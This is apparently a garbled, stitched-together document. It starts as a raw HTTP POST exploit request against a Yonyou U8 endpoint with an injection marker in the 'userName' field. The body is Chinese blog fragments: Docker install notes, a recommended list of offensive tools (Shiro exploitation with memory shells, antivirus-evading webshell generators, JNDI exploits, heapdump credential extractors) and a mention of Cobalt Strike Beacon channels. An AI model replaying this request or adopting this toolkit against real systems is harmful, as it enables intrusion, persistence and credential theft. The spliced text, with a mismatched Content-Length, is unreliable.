POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A2BF47E766B3CFCFA6BB152CC6C175B9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
userName=*最近经常高频使用docker和docker-compose,没事就百度,总结一下 1.装dockercurl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun2.装docker-compose 从Github下载docker-compose 移动到/usr/local/bin/docker-compose赋予执行权限chmod +x /usr/local/bin/docker-compose
或许真的应该跟上时代的潮流,学习一些新的技能/知识了。传统的web似乎有点打不动了...
1.用友系列 GUI版本 用友NC因为禁用了很多类,不是那么容易直接回显和打内存马,这款工具解决了这点 命令行版 无漏洞利用 2.OA综合利用 Thelostworld_OA.jar Github搜即可 3.Shiro 之前收集了很多的shiro工具,这里作者推荐老牌工具 ShiroAttack2 这工具还有个再次加强版,作者的描述增加Suo5 v0.8.0内存马 增加UpgradeMemshell内存马 增加内存马自定义payload key选项,消除工具特征 消除内存马pass、path特征ShiroAttack2再次加强版 4.IIS短文件名猜解工具 IIS-ShortName-Scanner 5.JAR包分析工具 jar-analyzer-gui 6.mysql恶意服务端 mysql-fake-server 7.JNDI Expolit JNDIExploit-1 8.数据库综合利用工具 但MSSQL我还是选择SharpSQLToolsMDUT 9.流量分析工具 BlueTeamTools 10.两个免杀Webshell的工具 但是好像有些是秒杀马 ByPassBehinder4J ByPassGodzilla 11.JDBC链接提取工具 InjectJDBC 12.哥斯拉内存马 GodzillaMemoryShellProject 13.HeapDump heapdump提取工具,命令行 以前的heapdump都是用MemoryAnalyzer人工分析,非常折磨,现在可以一键提取出有用信息了。 JDumpSpider
方便初学者理解CS Beacon的多种通信方式,文章介绍了包括 HTTP/HTTPS SMB DNS TCP